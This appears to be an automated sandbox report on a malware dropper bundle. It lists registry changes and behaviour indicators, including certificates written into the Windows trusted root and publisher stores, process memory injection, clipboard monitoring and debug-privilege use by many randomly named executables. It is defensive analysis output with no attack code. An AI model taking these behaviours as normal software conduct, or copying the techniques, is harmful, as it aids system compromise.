Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = eda47e9320aed701 | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\totalcoolblog.com\NumberO = "0" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | ha.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{08DB2AE0-0C81-4FE3-B724-F3F9FAFEEDBB}" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4274743b14c9d701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\ = "1667" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList | msiexec.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5ae0111f14c9d701 | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 500d917715c9d701 | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = d0bee22414c9d701 | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14} | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "341871647" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 | Jupikoqezhae.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | vpn.tmp
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | vpn.tmp
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | vpn.tmp
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 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 | Jupikoqezhae.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 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 | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | Calculator.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 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 | Calculator.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | vpn.tmp
Runs ping.exe 1 TTPs 3 IoCs
Processes:
pid | process
6828 | PING.EXE
8952 | PING.EXE
7320 | PING.EXE
Script User-Agent 13 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 1114 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 316 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1001 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1005 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1046 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1031 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1041 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1067 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 1112 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 99 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 779 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 962 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 997 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
9600 | SmartClock.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
3212 | CrowdInspect64.exe (the same entry is repeated for all 64 IoCs)
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
Processes:
pid | process
3212 | CrowdInspect64.exe
2848 | (process name empty in the report)
5564 | explorer.exe
3036 | cmd.exe
1508 | taskmgr.exe
Suspicious behavior: MapViewOfSection 29 IoCs
Processes:
pid | process
2116 | cmd.exe
5492 | 6PzDKqTumYc6wQmCZmE1EFMz.exe
6900 | F30D.exe
2704 | yoX1lbJjB0CYEqqcW6Y2Yb_p.exe
10152 | 70E5.exe
8260 | Conhost.exe
10056 | MicrosoftEdgeCP.exe (×2)
8368 | cmd.exe (×5)
5564 | explorer.exe (×4)
8124 | dcfbdig
9568 | trfbdig
8836 | MicrosoftEdgeCP.exe (×4)
10896 | MicrosoftEdgeCP.exe (×2)
9424 | MicrosoftEdgeCP.exe (×2)
6176 | dcfbdig
5968 | trfbdig
Suspicious behavior: SetClipboardViewer 4 IoCs
Processes:
pid | process
5912 | 1104282.exe
6172 | 6670411.exe
7064 | 7590801.exe
3036 | cmd.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3212 | CrowdInspect64.exe (the same entry is repeated for all 64 IoCs)
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid | process
4380 | Sat1481f5a7e3eccdd.tmp
2848 | (process name empty in the report) (×2)
5564 | explorer.exe (×52)
5064 | setting.exe
7836 | installer.exe
5564 | explorer.exe (×2)
8004 | DrvInst.exe
3388 | Calculator.exe
5564 | explorer.exe (×3)
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid | process
5564 | explorer.exe (the same entry is repeated for all 64 IoCs)
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
pid | process
2588 | ha.exe (×2)
3212 | CrowdInspect64.exe
1044 | setup_x86_x64_install.exe
2176 | setup_installer.exe
3120 | setup_install.exe
3628 | Sat142ac5249376e895.exe
512 | Sat14514904a4b.exe
3624 | Sat142b09ae40c44cf.exe
2164 | Sat1481f5a7e3eccdd.exe
1112 | Sat14b47e86b9c16b.exe
1412 | Sat1481f5a7e3eccdd.tmp
4200 | Sat1481f5a7e3eccdd.exe
4380 | Sat1481f5a7e3eccdd.tmp
4928 | werfault.exe
2184 | search_hyperfs_206.exe
5028 | setup.exe
2336 | Calculator Installation.exe
1472 | postback.exe
5804 | 7PeayF9Tb5XcknwhFlZFItg1.exe
6052 | Hucq3cRU783T_YaR6f0rcMBe.exe
3076 | BeNlWgh16GLAdiYLOwOe1lqZ.exe
2204 | 1luUodQBKunwgCepAZE5m_rN.exe
2684 | Knv5tLGcITqzriOiFtbYIHkp.exe
5132 | ghyLwzsW68yJrRDdcOnQsReb.exe
5640 | cutm3.exe
2584 | inst3.exe
5692 | build.exe
6732 | dBfLigPnGbkVroMLScuPczOh.exe
5880 | 7536159.exe
3908 | GKWt8jAAi7IwCqNCN3FGm_q4.exe
3972 | GKWt8jAAi7IwCqNCN3FGm_q4.tmp
3752 | setup.exe
5216 | VQkGBnO_XmTtKCVqhBHSUro2.exe
2796 | powershell.exe
2212 | ue41KJ_oVzM77L8GxPePgl1A.exe
2404 | BMameXGTyFCpxcZ9otZTnGuy.exe
6692 | 45McdKh4yEN6rqCKY0ZuGRQk.exe
6516 | Conhost.exe
6336 | 4sJmy4OYqmAdZtWjrOficbSi.exe
6184 | I1yxyBjCi2rjqqaotCgEwtTy.exe
5764 | Vo1z98SLibb53bBUs5I2fSxG.exe
3244 | aDm5wtNVVBVZLktXPpIsLYMC.exe
5192 | aDm5wtNVVBVZLktXPpIsLYMC.tmp
6268 | setup.exe
7076 | 7432933.exe
2476 | SearchUI.exe
3224 | ShellExperienceHost.exe (×2)
7480 | X9CrMOGrOpPKIZqgtV8aNLBI.exe
7548 | von6J2rHI2UgQky674Td90lo.exe
5768 | 6199182.exe
5564 | explorer.exe
2780 | MicrosoftEdge.exe
6868 | any.exe
8268 | customer51.exe
8208 | setup.exe
8668 | FastPC.exe
5932 | FastPC.exe
8004 | DrvInst.exe
9348 | autosubplayer.exe
10040 | powershell.exe
9420 | MicrosoftEdgeCP.exe
9756 | 8217699.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1044 wrote to memory of 2176 | 1044 | setup_x86_x64_install.exe | setup_installer.exe (×3)
PID 2176 wrote to memory of 3120 | 2176 | setup_installer.exe | setup_install.exe (×3)
PID 3120 wrote to memory of 3880 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 2504 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3880 wrote to memory of 1484 | 3880 | cmd.exe | powershell.exe (×3)
PID 2504 wrote to memory of 3036 | 2504 | cmd.exe | powershell.exe (×3)
PID 3120 wrote to memory of 3168 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 420 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 3216 | 3120 | setup_install.exe | cmd.exe (×3)
